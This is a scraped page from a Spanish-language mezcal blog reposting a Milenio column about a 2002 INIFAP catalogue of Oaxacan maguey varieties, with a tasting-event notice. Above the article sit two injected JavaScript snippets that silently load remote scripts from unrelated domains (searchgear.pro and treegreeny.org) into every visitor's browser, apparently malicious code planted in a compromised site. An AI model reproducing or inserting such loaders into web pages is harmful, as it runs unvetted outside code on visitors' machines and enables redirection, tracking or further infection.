;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 44. Maguey mezcalero oaxaqueño

44. Maguey mezcalero oaxaqueño


Publicado en diciembre de 2002, La materia prima para producir el mezcal oaxaqueño. Catálogo de la diversidad de agaves, es un documento indispensable para conocer los magueyes de Oaxaca. En él podemos ver las fotografías de 25 de ellos acompañadas de datos como: nombre común; nombre científico, si lo tiene; sitio de colecta, incluyendo altitud, latitud y longitud geográfica, así como el distrito y municipio donde se localiza; altura de la planta; diámetro; forma, longitud y ancho de las pencas; y la longitud de la espina terminal. Magueyes localizados específicamente en los distritos de Tlacolula, Ocotlán, Ejutla, Zimatlán, Sola de Vega, Miahuatlán y Yautepec que, como todo oaxaqueño sabe, no son los únicos en los que se elabora mezcal, pues – como un ejemplo- también se hace en la Mixteca.
Es importante decir que, conforme a información proporcionada por maestros mezcalilleros y productores de maguey, se puede afirmar que en Oaxaca existen al menos 50 tipos de maguey para hacer mezcal, lo que nos da una pequeña muestra de la enorme riqueza y diversidad de los mezcales tradicionales oaxaqueños.
En las conclusiones del manual se dice: “la información presentada permite reflexionar sobre la urgencia de iniciar una serie de estudios básicos para precisar en cada especie aspectos como: adaptación, fenología, velocidad de crecimiento, formas de reproducción, resistencia a plagas y enfermedades, rendimiento y calidad del producto final (mezcal), entre otros”. Y, en la introducción, se afirma que “esta diversidad está siendo amenazada por el cultivo intensivo y extensivo de una sola especie”, refiriéndose al Espadín.
Los autores del catálogo fueron Horacio Espinoza, Carlos Arredondo, Miguel Cano, Acacio Canseco y Félix Vázquez; fue editado por el Instituto de Investigaciones Forestales, Agrícolas y Pecuarias (www.inifap.gob.mx).
Para probar mezcales oaxaqueños elaborados con magueyes silvestres, hay que acudir el martes a las 20 horas a Red Fly: Orizaba 145, colonia Roma, D.F.
http://impreso.milenio.com/node/8845464

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *